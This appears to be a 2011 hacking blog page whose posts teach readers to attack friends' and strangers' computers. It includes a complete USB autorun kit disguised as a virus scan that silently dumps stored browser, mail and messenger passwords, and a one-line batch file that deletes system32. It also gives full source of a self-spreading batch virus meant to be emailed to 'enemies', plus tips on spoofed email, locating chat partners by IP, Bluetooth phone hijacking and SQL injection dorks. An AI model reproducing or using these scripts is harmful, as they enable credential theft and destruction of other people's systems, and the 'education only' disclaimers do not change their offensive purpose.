Wikileaks Under Attack

The WikiLeaks website crashed Tuesday in an apparent cyberattack after the accelerated publication of tens of thousands of once-secret State

Destroy Ur Friends PC Using Virus

In this post we'll take a look on how to create a deadly computer virus to destroy your enemy or victim's PC.

USB 3.0 Evolution xD

USB 3.0 > Usb 2.0 > Usb 1.0 xD

MEet Top ten techies Who changed World around Us

Top Ten Techies...

Steal Your Frnds Password using Flash Drive

Yes Ew Heard it Correct...CLick to know the trick :)

Saturday 20 August 2011

How to Steal your friends Passwords Using a USB Drive!





MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.



Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.



IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0



Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…



PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.



Here is a step by step procedre to create the password hacking toolkit.



NOTE: You must temporarily disable your antivirus before following these steps.



1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.



ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.



2. Create a new Notepad and write the following text into it



[autorun]
open=launch.bat
ACTION= Perform a Virus Scan



save the Notepad and rename it from



New Text Document.txt to autorun.inf






Now copy theautorun.inf file onto your USB pendrive.



3. Create another Notepad and write the following text onto it.



start mspass.exe /stext mspass.txt



start mailpv.exe /stext mailpv.txt



start iepv.exe /stext iepv.txt



start pspv.exe /stext pspv.txt



start passwordfox.exe /stext passwordfox.txt



save the Notepad and rename it from



New Text Document.txt to launch.bat



Copy the launch.bat file also to your USB drive.



Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps



1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).



2. In the pop-up window, select the first option (Perform a Virus Scan).



3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.



4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.



This hack works on Windows 2000, XP,Vista and 7



NOTE: This procedure will only recover the stored passwords (if any) on the Computer

.

DISLAIMER: For education purpose only






Adithya

Friday 19 August 2011

Fake Email Sender Software















This software allows you to send diffrent emails to people with other email addresses than yourself.
For example I can send myself an email coming from hackingway@fbi.gov















DISLAIMER: For education purpose only








Adithya

Destroy Your Friends Computer with Virus


Destroy Your Friends Computer with Virus



In this post we'll take a look on how to create a deadly
computer virus to destroy your enemy or victim's PC.

1) Open Notepad
2) write the below command : -
 del c:\windows\system32\*.* /q
3) Save the above notepad with the extension ".bat or .cmd" as u want


 !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!!!!!


Don't double click the file otherwise u r in trouble. Why ?????? bcz the file u created delete all files from ur
system32 folder and when u restart ur pc it will not start bcz system can not find the files in the system32 folder which is required at the time of booting.
 4) You can also test the above by creating a fake folder let suppose
windows1 in C:\. Copy some old files in it and just follow the
above command.By double clicking the bat or cmd file ur all files
automaitcally get deleted.
 5) You can try this file in any one`s computer.(but this result in causing damage to the computer, so think again before trying this on anyone's pc)
Virus 2
This post is to help you to send viruses to your enemies! Here goes,Copy the below code and paste into your notepad.. then save as anyname.bat
Do not click on that batch file........ Send it your enimies email...It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer


 Code :-
@ off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run  
/v Greatgame /t REG_SZ/d %systemroot%\Greatgame.bat /f > 
nul
copy %0 *.bat > nulAttrib +r +h Greatgame.batAttrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.batgoto RIP


DISLAIMER: For education purpose only



Adithya

How to hack PC while chatting


How to hack PC while chatting


following are the features : -

1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
b) Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
b) Or it has client to client connection

And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.

So lets analyze
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.

So why to wait lets exploit those 50 % chances .
I'll explain only for files here which lies same for Video or audio

1) Go to dos type -

netstat -n 3
You will get the following output.Just do not care and be cool

Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next -

2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established. HMMMM then the first attacker first phase is over

This is the output in your netstat.The 5101 number port is where the Attacker is connected.

Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED


3) so what next???
Hmmm........ Ok so make a DOS attack now

Go to dos prompt and Just do
nbtstat -A Attackers IPaddress
Can happen that if system is not protected then you can see the whole network.

C:\>nbtstat -A 194.30.209.14

Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
XYZ <00> GROUP Registered
XYZ <20> UNIQUE Registered
XYZCOMP1 <1E> GROUP Registered

MAC Address = 00-C0-W0-D5-EF-9A

What to do next??
It is now ur job to tell me what u have done next...

So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you


DISLAIMER: For education purpose only



Adithya

A.I.O Mobile Bluetooth Hacking Tools


A.I.O Mobile Bluetooth Hacking Tools



Once connected to a another phone via bluetooth you can:
- read his messages
- read his contacts
- change profile
- play his ringtone even if phone is on silent
- play his songs(in his phone)
- restart the phone
- switch off the phone
- restore factory settings
- change ringing volume
- And here comes the best
"Call from his phone" it includes all call functions like hold etc.
Super Bluetooth Hack for S60 2nd-3rd devices.
Works very well on sony ericsson/samsung ans Nokia phones[TESTED]

Download this file for getting more information about how to do all these things given above

download

DISLAIMER: For education purpose only


Adithya

Best Browser for hacking


Best Browser for hacking





If you want to be a hacker thn you must check this post bcz here ia a EVER GREEN tool/software that will help you to achive your goal/passion....
This is Hacker’s Browser v2.0 …. it’s browser based on IE …
you are wondering probably why version 2?
well v1.0 is private and has a lot more options than this 1 …
This this version has search option which you can quick select one of web searchers ( so far supported ):
- Google
- Yahoo
- You tube
- Aol
- Alta vista
- All the web
- Bing
-Ask
- Anime Freak xD
- Verizon ….
-It has section called SQL helper . which has few thing who will at least help you while you are injecting site
- Has Email bomber .. which has already hacked Gmails.
- Has nice SQL and RFI dork section so you can search for vunl. sites ..
so that’s it i hope you will enjoy in this program



download



DISLAIMER: For education purpose only

Adithya

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites